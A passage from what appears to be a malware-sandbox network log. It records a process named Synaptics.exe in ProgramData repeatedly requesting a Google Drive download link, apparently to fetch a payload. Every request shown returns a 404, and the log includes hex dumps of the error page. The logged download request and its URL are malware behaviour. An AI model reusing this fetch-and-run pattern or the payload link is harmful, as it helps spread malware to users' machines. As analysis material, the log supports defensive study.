                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC159INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:36 UTC159INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 68 39 4f 30 36 72 5a 70 36 6b 4d 51 2b 57 32 4b 68 49 61 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wh9O06rZp6kMQ+W2KhIagg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:36 UTC161INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:36 UTC161INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        53192.168.2.349803142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC158OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC161INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vnZTLga3i2+D4T8bQOOwfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC162INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:36 UTC162INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 31 4b 42 4c 35 70 4d 58 79 6d 75 52 67 75 53 67 52 54 53 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a1KBL5pMXymuRguSgRTSaQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:36 UTC163INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:36 UTC164INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        54192.168.2.349804142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC164OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JP+o8+isfzLxsxEPmzb9kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC165INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:36 UTC165INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 6c 37 77 47 41 4f 48 73 4b 47 78 49 48 6f 4c 34 47 35 5a 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0l7wGAOHsKGxIHoL4G5Z0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:36 UTC167INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:36 UTC167INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        55192.168.2.349805142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC164OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC167INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2Q0pg/KDTPML4b8+6nhGIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC169INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 51 32 6a 6f 63 47 5a 52 30 43 43 39 4a 6c 6d 34 68 35 39 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Q2jocGZR0CC9Jlm4h59Mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:36 UTC170INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:36 UTC170INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        56192.168.2.349806142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC167OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC170INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0QscEfeosSOAXYJzN48dFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC172INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 62 48 38 44 50 54 35 61 30 57 39 48 52 34 31 61 74 34 35 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WbH8DPT5a0W9HR41at45tA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:36 UTC173INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:36 UTC173INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        57192.168.2.349807142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC170OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC173INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SGJAy9Y4v5Sdqiez1sVXAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
